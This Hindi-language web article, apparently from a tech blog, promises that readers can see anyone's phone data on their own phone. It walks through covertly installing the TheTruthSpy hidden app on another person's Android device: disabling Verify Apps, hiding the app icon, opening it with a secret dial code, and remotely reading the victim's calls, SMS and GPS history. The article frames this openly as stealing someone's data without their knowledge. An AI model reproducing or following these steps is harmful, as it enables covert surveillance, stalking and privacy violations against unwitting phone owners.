Loading...

बस ये एक सेटिंग कर दीजिए और उसके बाद किसी के भी फोन का डाटा आपके फोन में नजर आएगा

0 30

मौजूदा समय में कई सीक्रेट ऐप मौजूद हैं, लेकिन उस समय में एक सीक्रेट ऐप ऐसी भी है, जिसे अगर आप किसी के फोन में इंस्टॉल कर देते हैं तो उस ऐप की मदद से आप उसके फोन का पूरा डाटा चुरा सकते हैं. आपको बता दें कि यह ट्रिक सिर्फ उन स्मार्टफोन में काम करती है जिन स्मार्टफोन में Android 5.0 लॉलीपॉप या फिर उससे ऊपर का ऑपरेटिंग सिस्टम होता है.

आपको जिस स्मार्टफोन का डाटा अपने स्मार्टफोन में देखना है तो आप उस स्मार्टफोन में TheTruthSpy ऐप को इंस्टॉल कर दीजिए, यानी कि इस ऐप को किसी के स्मार्टफोन में इंस्टॉल करने के लिए सिर्फ आपको 2 मिनट के लिए उसका फोन लेना होगा. यह एक तरह की हिडन ऐप होती है और इसके बारे में किसी को भी पता नहीं चलता है.

इस ऐप को उस फोन में इंस्टॉल करने से पहले आप फोन की Setting में सिक्योरिटी में जाकर Unknown Sources और Google के सिक्योरिटी फीचर से Verify Apps को जरूर ऑफ कर दें.

Loading...

अब आप फोन ब्राउज़र में जाकर Android.thetruthspy.com को ओपन करें और यहां से ऐप को उस फोन में इंस्टॉल कर लें. TheTruthSpy ऐप को इंस्टॉल करने के बाद रजिस्टर कर लें.

अब आप ईमेल ID डालकर एक नया पासवर्ड बना लें और ऐप को एक्टिवेट करके आप कॉन्फ़िगरेशन में जाकर हाइट आइकन पर क्लिक कर दें. जब भी आपको यह फोन में ओपन करना हो तो इसके लिए आपको #2013* स्टार कोड का उपयोग करना होगा.

इसके बाद आप Android.TheTruthSpy.com वेबसाइट को ओपन करें और यहां All Features पर टैप करके साइन इन कर लें. आप यहां पर Call, SMS, GPS हिस्ट्री की पूरी डिटेल आसानी के साथ देख सकते हैं.

Loading...

Leave A Reply

Your email address will not be published.